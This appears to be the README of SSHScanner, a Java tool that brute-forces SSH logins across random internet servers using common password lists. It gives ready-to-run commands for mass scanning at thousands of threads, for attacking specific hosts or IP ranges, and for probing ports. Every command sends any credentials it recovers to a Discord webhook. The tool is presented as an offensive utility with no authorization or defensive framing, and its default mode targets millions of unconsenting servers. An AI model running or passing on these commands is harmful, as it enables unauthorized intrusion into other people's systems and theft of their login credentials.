This tool scans random SSH servers around the world and it tests the most used passwords
You can reuse SSHScanner but make sure you comply with the LICENSE.
<dependencies>
<dependency>
<groupId>com.thisisnzed</groupId>
<artifactId>SSHScanner</artifactId>
<version>1.2.0-SNAPSHOT</version>
</dependency>
</dependencies>
- JSch : http://www.jcraft.com/jsch/
- I. Download the latest release of SSHScanner
- II. Launch the program
Here are some examples of commands according to your need
- Scan random SSH servers : java -jar SSHScanner.jar -combo combo.txt -threads 1 -port 22 -timeout 6000 -webhook "https://discord.com/api/webhooks/x/y" -verbose true
- Scan SSH range : java -jar SSHScanner.jar -range range.txt -combo combo.txt -threads 3000 -port 22 -timeout 6000 -webhook "https://discord.com/api/webhooks/x/y" -verbose false
- Scan specific SSH server : java -jar SSHScanner.jar -combo combo.txt -threads 1 -port 22 -timeout 6000 -webhook "https://discord.com/api/webhooks/x/y" -verbose true -host "127.0.0.1"
- Scan ports of specific SSH server (to get SSH port) : java -jar SSHScanner.jar -combo combo.txt -timeout 1100 -webhook "https://discord.com/api/webhooks/x/y" -verbose true -host "127.0.0.1" -portlist ports.txt
Note: Each argument is optional
- -combo | File containing all the "user:password" that the program will test for each host (default: combo.txt)
- -threads | Number of threads launched (default: 1)
- -port | Port that will be tested for each host (default: 22)
- -timeout | Time (in ms) before the program marks a server as unavailable (default: 6000)
- -webhook | Discord webhook where credentials will be sent (default: "")
- -verbose | Whether or not to display failed attempts on the console (default: true)
- -host | WARNING: Only for bruteforce specific host | Use this parameter ONLY if you want to perform a bruteforce attack on a specific SSH server - if you use this parameter you only will attack the requested server and not millions of random servers around the world (default: "")
- -range | WARNING: Only for bruteforce specifics ranges | Use this parameter ONLY if you want to perform a bruteforce attack on specifics SSH servers (by putting ranges) - if you use this parameter you only will attack the requested ranges and not millions of random servers around the world (default: "")
- -portlist | WARNING: Only to get SSH port | Use this parameter ONLY if you want to perform a bruteforce port attack on specific SSH server - if you use this parameter you only will attack the requested server (default: "")